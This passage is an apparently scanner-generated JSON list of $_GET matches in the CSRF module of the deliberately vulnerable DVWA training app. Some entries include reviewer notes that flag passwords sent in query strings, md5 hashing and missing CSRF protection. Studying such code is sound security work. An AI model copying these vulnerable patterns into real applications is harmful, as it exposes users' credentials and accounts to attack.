class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 143,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 144,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span 
class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token 
variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 150,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token 
string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 151,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 8,
  "start": 3,
  "end": 14,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 152,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> 
<span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token 
punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 153,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span 
class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise current password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token 
variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 10,
  "start": 5,
  "end": 16,
  "severity": "unknown",
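  "note": "All three password fields are read from the query string ($_GET), so they can be retained in access logs, browser history and Referer headers. Line 15 hashes the current password with md5(), which is not suitable for password storage; prefer password_hash() and password_verify()."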
 },
 {
  "id": 159,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
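  "note": "The password change is triggered by a GET parameter, and the visible lines (1-8) show no anti-CSRF token, no origin check and no current-password prompt before the input is read. Require POST with a per-session token and re-authentication with the current password."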
 },
 {
  "id": 160,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token 
operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
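  "note": "The new password arrives in the URL query string, which is commonly retained in server logs, browser history and Referer headers. Accept credentials in a POST body only."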
 },
 {
  "id": 161,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Do</span> the passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token 
operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> They <span class=\"token keyword\">do</span>!\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the 
mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 165,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Checks <span class=\"token keyword\">to</span> see where the request came from\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stripos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> 